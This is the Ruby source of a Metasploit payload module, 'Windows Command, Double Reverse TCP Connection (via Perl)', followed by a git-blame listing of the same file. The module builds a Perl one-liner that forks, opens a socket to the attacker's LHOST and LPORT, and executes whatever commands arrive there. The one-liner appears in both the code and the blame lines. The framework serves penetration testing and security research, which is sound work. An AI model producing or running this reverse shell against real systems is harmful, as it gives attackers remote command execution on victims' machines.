modules/payloads/singles/cmd/windows/reverse_perl.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module MetasploitModule

  CachedSize = 148

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Windows Command, Double Reverse TCP Connection (via Perl)',
      'Description'   => 'Creates an interactive shell via perl',
      'Author'        => ['cazz', 'aushack'],
      'License'       => BSD_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_CMD,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShell,
      'PayloadType'   => 'cmd',
      'RequiredCmd'   => 'perl',
      'Payload'       =>
        {
          'Offsets' => { },
          'Payload' => ''
        }
      ))
  end

  #
  # Constructs the payload
  #
  def generate
    return super + command_string
  end

  #
  # Returns the command string to use for execution
  #
  def command_string
    lhost = datastore['LHOST']
    ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
    cmd   = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
  end
end
crossing fingers, big cr removal batch 2009-12-30 22:24:22 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
crossing fingers, big cr removal batch 2009-12-30 22:24:22 +00:00			`##`

			`require 'msf/core/handler/reverse_tcp'`
			`require 'msf/base/sessions/command_shell'`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00			`require 'msf/base/sessions/command_shell_options'`
crossing fingers, big cr removal batch 2009-12-30 22:24:22 +00:00
use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`module MetasploitModule`
crossing fingers, big cr removal batch 2009-12-30 22:24:22 +00:00
Instantiate payload modules so parameter validation occurs 2015-08-13 11:10:50 -05:00			`CachedSize = 148`
The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 15:31:04 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Payload::Single`
			`include Msf::Sessions::CommandShellOptions`
crossing fingers, big cr removal batch 2009-12-30 22:24:22 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(merge_info(info,`
Fix missed title 2013-11-25 22:46:35 -06:00			`'Name' => 'Windows Command, Double Reverse TCP Connection (via Perl)',`
Retab modules 2013-08-30 16:28:54 -05:00			`'Description' => 'Creates an interactive shell via perl',`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`'Author' => ['cazz', 'aushack'],`
Retab modules 2013-08-30 16:28:54 -05:00			`'License' => BSD_LICENSE,`
			`'Platform' => 'win',`
			`'Arch' => ARCH_CMD,`
			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'cmd',`
Add missing RequiredCmds 2014-02-08 12:24:49 +00:00			`'RequiredCmd' => 'perl',`
Retab modules 2013-08-30 16:28:54 -05:00			`'Payload' =>`
			`{`
			`'Offsets' => { },`
			`'Payload' => ''`
			`}`
			`))`
			`end`
crossing fingers, big cr removal batch 2009-12-30 22:24:22 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`#`
			`# Constructs the payload`
			`#`
			`def generate`
			`return super + command_string`
			`end`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`#`
			`# Returns the command string to use for execution`
			`#`
			`def command_string`
			`lhost = datastore['LHOST']`
			`ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""`
			`lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)`
			`cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}`
			`end`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00			`end`